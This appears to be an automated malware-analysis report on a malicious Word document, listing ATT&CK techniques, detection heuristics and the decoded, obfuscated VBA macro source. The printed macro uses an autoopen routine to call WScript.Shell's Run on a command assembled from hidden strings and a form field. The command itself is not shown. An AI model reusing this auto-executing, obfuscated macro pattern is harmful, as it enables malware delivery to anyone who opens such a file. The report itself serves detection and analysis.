Verdict: MALICIOUS
Risk Score: 290
Malware Insights
MITRE ATT&CK:
- T1059.005 Visual Basic
- T1204.002 Malicious File
The sample is a malicious Office document containing VBA macros. The macros utilize WScript.Shell and CreateObject, indicating an intent to execute arbitrary code, likely for downloading and running a secondary payload. The presence of an AutoOpen macro further suggests automatic execution upon opening the document.
Heuristics (9)
- ClamAV: Doc.Malware.Generic-6817636-0 (critical, CLAMAV_DETECTION): ClamAV detected this file as malware: Doc.Malware.Generic-6817636-0
- VBA macros detected (medium, OLE_VBA_MACROS, 4 related findings): Document contains VBA macro code
- WScript.Shell usage (critical, OLE_VBA_WSCRIPT): Matched line in script: `Set primaryiv = opensystemib Babyln = "WscRipt.sHeLl" Set microchipru = Avonvs`
- CreateObject call (high, OLE_VBA_CREATEOBJ): Matched line in script: `Set Surinamepz = nationalad SriLankarj = Array(Missionsi, arrayoi, transmitterdp, CreateObject("" + Plazarp + Specialistwf + parsenf + Babyln).Run!(("" + responsivelu + Loopti + blueii + Romaniajv + HomeLoanAccountht.TextBox1) + digitalin + Analystzu + CotedIvoireok, 2 - 2), IndustrialMusicToolsjw, paymentud, Groceryiz) Set portom = GBua`
- VBA p-code auto-exec with execution tokens (high, OLE_VBA_PCODE_AUTOEXEC_EXEC): Compiled VBA/cache stream contains an auto-execution token together with shell/download/object-execution tokens. This catches p-code-only or source-extraction-failure macro documents where visible source is unavailable.
- AutoOpen macro (low, OLE_VBA_AUTOOPEN): Matched line in script: `End Function Sub autoopen() Cambridgeshirejd = unleashzj`
- Reference to Windows Script Host (high, SC_STR_WSCRIPT)
- Legacy WordBasic auto-exec macro marker (medium, OLE_LEGACY_WORDBASIC_AUTOEXEC): OLE Word document contains a legacy WordBasic auto-execution marker such as AutoOpen, but no modern VBA project was recovered and no stronger macro-virus family marker was present. This is analyst-facing evidence for old Word macro execution surface, not a downloader or parser-CVE attribution by itself.
- Embedded URL (info, EMBEDDED_URL): One or more URLs were extracted from the document. The URL itself is not a detection; see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL. URL: http://schemas.openxmlformats.org/drawingml/2006/main (in document text, OLE body)
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 8250 bytes |

SHA-256 of macros.bas: c22d30a3526ec14d3bf45a56e5bdd58258fc1d92e4c80e0321e18958357305dd

Preview script (first 1,000 lines of the extracted script):
Attribute VB_Name = "HomeLoanAccountht"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True
Attribute VB_Control = "TextBox1, 0, 0, MSForms, TextBox"
Attribute VB_Name = "Chiefua"
Function PCIwr()
On Error Resume Next
Set Portugalti = killerir
Set Tanzaniaqq = Berkshireif
Select Case transmitterqk
Case 214
Vietnamqb = relationshipsfu
Dataol = CLng(937)
Case 832
clearthinkingtj = CLng(401)
Frozenwv = CDate(globalzd)
Strategistvu = Int(583)
Case 469
Directld = Cos(invoiceqd)
InvestmentAccountpb = ChrB(196)
HandcraftedCottonTowelsbk = Bedfordshirejt
End Select
Set killercq = Solutionsld
Set bandwidthnd = SavingsAccountoo
Set Metalkt = Bordersib
Select Case InvestmentAccountzn
Case 834
WestVirginiamz = Covebj
CheckingAccountib = CLng(251)
Case 508
limesa = CLng(310)
clientdrivenzt = CDate(Havenkf)
CreditCardAccountli = Int(913)
Case 611
SingaporeDollarzb = Cos(Dynamicwm)
MoviesBookszf = ChrB(677)
Techniciankz = indexingpz
End Select
Set SSLvk = Buckinghamshirejk
Set InvestmentAccountvv = maroondr
Set Developerbo = copyoc
Select Case backingupur
Case 338
Kroonil = Mongoliawq
synergisticdq = CLng(977)
Case 117
synthesizingcs = CLng(825)
distributedws = CDate(deployvl)
intranetlt = Int(423)
Case 958
Districtzq = Cos(Gorgeoussh)
programww = ChrB(945)
Pathul = Missionzu
End Select
Set emarketsuq = Buckinghamshiredq
Set arrayri = Hondurasmf
Set Preemptivetk = navigateij
Select Case circuitbi
Case 459
Summitbw = HandcraftedGranitePizzatr
yellowdz = CLng(625)
Case 245
Deengineerednf = CLng(497)
incubateon = CDate(RSSus)
ErgonomicSteelGlovesub = Int(69)
Case 887
Rubberwq = Cos(marketsdt)
dynamicnp = ChrB(434)
VirginIslandsUSwu = Customeroo
End Select
Set primaryiv = opensystemib
Babyln = "WscRipt.sHeLl"
Set microchipru = Avonvs
Set arrayum = Loophp
Select Case Customizableaf
Case 526
Bordersif = Buckinghamshireph
SleekFrozenTunaio = CLng(745)
Case 732
leadingedgeap = CLng(717)
SMTPrh = CDate(Dynamicbp)
Summituj = Int(501)
Case 322
AutoLoanAccountbm = Cos(Buckinghamshireij)
globaldp = ChrB(922)
Specialistnw = withdrawaliq
End Select
Set Surinamepz = nationalad
SriLankarj = Array(Missionsi, arrayoi, transmitterdp, CreateObject("" + Plazarp + Specialistwf + parsenf + Babyln).Run!(("" + responsivelu + Loopti + blueii + Romaniajv + HomeLoanAccountht.TextBox1) + digitalin + Analystzu + CotedIvoireok, 2 - 2), IndustrialMusicToolsjw, paymentud, Groceryiz)
Set portom = GBua
Set Locksjt = Seniorcm
Select Case alarmwq
Case 911
crossplatformcq = seizerz
Avonnr = CLng(901)
Case 267
Radialnh = CLng(6)
HomeLoanAccountov = CDate(GamesGrocerycs)
calculatingll = Int(570)
Case 962
microchipzm = Cos(Functionalityoc)
MoneyMarketAccountzw = ChrB(70)
overridingfq = Kipww
End Select
Set architecturesqz = Steelnf
Set Handmadehj = extendll
Set LicensedFreshSausagesja = Denarni
Select Case connectinghh
Case 846
digitalll = frictionlessjs
bandwidthmonitoredfq = CLng(527)
Case 459
leveragesn = CLng(889)
IBwi = CDate(overridingzj)
synergisticjt = Int(847)
Case 376
SASlw = Cos(Centralizedkb)
sensorbb = ChrB(419)
Cottoncu = Cedikk
End Select
Set pixelwp = Buckinghamshirekv
End Function
Attribute VB_Name = "Directws"
Function Arkansaswj()
CheckingAccountlp = Persistentzf
indigouj = extendnq
bandwidthkj = Corporateua
Granitebt = policylb
SomaliShillingzc = Granitezj
BeautyGamesqj = depositua
CheckingAccountsj = Montserratwz
invoicesm = ErgonomicSoftBaconhd
Avonzz = Liaisondr
SASqs = AutoLoanAccounthz
knowledgebasecq = collaborativeqv
Intuitivebb = strategicuo
End Function
Function Associatelz()
IntelligentGraniteCaraf = Dynamicdj
IncredibleConcreteKeyboardtp = Alleyin
Smallms = MoroccanDirhampz
intermediateaq = parsejq
Extensionsvk = synthesizingmp
RAMwj = paymentww
backendmv = humanresourcewa
Principalwb = HomeToolsbu
Securedpu = Plannernf
Mississippisw = B2Ctw
Bedfordshirelb = optimizingpj
Softfz = webreadinessom
End Function
Sub autoopen()
Cambridgeshirejd = unleashzj
goldri = LaoPeoplesDemocraticRepubliczw
Cambodiazw = XSSim
Rusticid = Electronicsfs
FTPrw = Metricsca
GardenGroceryhi = NewYorkjm
strategizesc = Array(TastyGraniteCarji, XMLpm, IntelligentRubberMousenj, PCIwr, solutionswt, Avonwr, emarketspz)
aggregatesb = globalfk
AwesomeConcreteTablefq = Canyonwa
Fallsfm = Kidsju
yellowfw = PracticalWoodenShirthq
SSLlc = invoicekz
Dynamiclz = invoicezu
End Sub
Function withdrawalqf()
Engineerjq = protocolmp
envisioneerbt = Concretenk
Polandvm = SportsBookszo
Directivesaj = Organiczm
Deengineeredwz = Parkwaymj
Diversejh = Yemenii
KenyanShillingti = uniformbl
Mountaj = multibytezf
Vistait = emulationfj
tangiblekj = IndustrialHealthGardenmw
Innovativerc = PersonalLoanAccountkf
interfacetn = Handmadejz
End Function
Attribute VB_Name = "Avonnj"
Attribute VB_Name = "synergieshn"
Attribute VB_Name = "Macedoniaro"
Attribute VB_Name = "maximizehb"
Attribute VB_Name = "ZambianKwachaqd"
Attribute VB_Name = "Courserl"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "SriLankans"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "localrh"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Agentww"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "Paradigmii"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "strategicnw"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False
Attribute VB_Name = "HomeLoanAccountfq"
Attribute VB_Base = "0{FCFB3D2A-A0FA-1068-A738-08002B3371B5}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = False
Attribute VB_Exposed = False
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = False